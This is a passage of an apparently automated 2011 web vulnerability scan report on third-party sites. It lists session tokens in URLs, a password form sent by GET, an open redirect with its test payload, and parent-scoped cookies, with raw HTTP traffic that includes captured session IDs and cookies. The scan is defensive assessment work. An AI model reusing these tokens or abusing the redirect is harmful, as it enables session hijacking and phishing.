<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

9. Session token in URL
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

9.2. http://clicktoverify.truste.com/images/pos_btn3.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/pos_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/pos_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81d072-1958-d12736c0"
Accept-Ranges: bytes
Content-Length: 6488
Content-Type: image/png

.PNG
.
...IHDR.............N..g...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

9.3. http://clicktoverify.truste.com/images/watch_btn3.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/watch_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/watch_btn3.png?PHPSESSID=b6a8c516419dafaa02e340bfd490167b HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:49 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81ce11-570-d12736c0"
Accept-Ranges: bytes
Content-Length: 1392
Content-Type: image/png

.PNG
.
...IHDR..............9'.....tEXtSoftware.Adobe ImageReadyq.e<....PLTETRP..b..:..R.....L...{.3........A..i..W........I........a..Y..^..z..W.....u..?.....6.._.....G..q.....?..S.....k..c..C.....
...[SNIP]...

9.4. http://clicktoverify.truste.com/pvr.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certi
...[SNIP]...
<div id="logo"><a href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=445d5b109b4f42ef794f06203204708d" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png"/>
...[SNIP]...

9.5. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=dc48a90a-d71a-4495-be5f-fba64a291740&hostname=www.gamersdailynews.com&location=%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&sessionID=1308921999537.90164&fpc=383617f-130c1d4b0b1-2c952677-1&ts1308922028876.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Fri, 24 Jun 2011 13:32:05 GMT
Connection: keep-alive


9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.silobreaker.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174&callback=_xdc_._w047jh&token=16347 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Fri, 24 Jun 2011 13:31:48 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._w047jh && _xdc_._w047jh( [1] )

9.7. https://softlayer.parallelsmarketplace.com/store/index.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

9.8. https://softlayer.parallelsmarketplace.com/store/index.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="passedStep">
<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=HOSTING_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea">Select Application</a>
...[SNIP]...
<td class="OrderRowTD" align="left" valign="top">

<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&act=remove&oitem=0" onclick="return confirmRemove();" class="IconRemove">Remove </a>
...[SNIP]...

9.9. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143a1bc3%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12abf4cdc%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7959e18%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25479d134%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa62428%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.59
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.

10. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...

11. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky was submitted in the adurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /pagead/aclk?sa=L&ai=BfELNjo8ETsG2FKP7lQesrNm2AceTxJcC76KQhyXAjbcBkN-hARABGAEgwcvRHjgAUJeRzKP______wFgydbyhsij_BqgAbeJ--kDsgEVd3d3LnBodWtldC10cmF2ZWwuY29tugEKMTIweDYwMF9hc8gBCdoBHWh0dHA6Ly93d3cucGh1a2V0LXRyYXZlbC5jb20vuAIYyAKvtZQaqAMB0QPgy9uX8AkKYegD7AfoA7Mt6AOzAegDzSfoA0P1AwAAAMQ&num=1&client=ca-pub-4422256122899399&val=ChAwY2E0MmQ4MTM3MDAwMGIzEM-pue4EGgjtg8uujvUQZyABKAE&sig=AGiWqtztk8LXvH-0DC-TiBn8CX7Ajzkjeg&adurl=http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoQCQmZFTE5qbzhFVHNHMkZLUDdsUWVzck5tMkFjZVR4SmNDNzZLUWh5WEFqYmNCa04taEFSQUJHQUVnd2N2UkhqZ0FVSmVSektQX19fX19fd0ZneWRieWhzaWpfQnFnQWJlSi0ta0RzZ0VWZDNkM0xuQm9kV3RsZEMxMGNtRjJaV3d1WTI5dHVnRUtNVEl3ZURZd01GOWhjOGdCQ2RvQkhXaDBkSEE2THk5M2QzY3VjR2gxYTJWMExYUnlZWFpsYkM1amIyMHZ1QUlZeUFLdnRaUWFxQU1CMFFQZ3k5dVg4QWtLWWVnRDdBZm9BN010NkFPekFlZ0R6U2ZvQTBQMUF3QUFBTVESEwj2_Mm30s6pAhUMO-UKHWAtgzoYASDq7I662qL18TNIAQ; expires=Sun, 24-Jul-2011 13:26:41 GMT; path=/pagead/conversion/1027523767/
Cache-Control: private
Location: http://ad26a94a492587d18/a?http://ad.doubleclick.net/click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:26:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


12. Cookie scoped to parent domain
There are 50 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=83986945579028480&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15234657 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.1.10.1308923300; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923391-40028-23588
X-RateLimit-Limit: 1000
ETag: "863510bfd05f46bc05fb758008ea14f6"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:49:51 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.05064
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
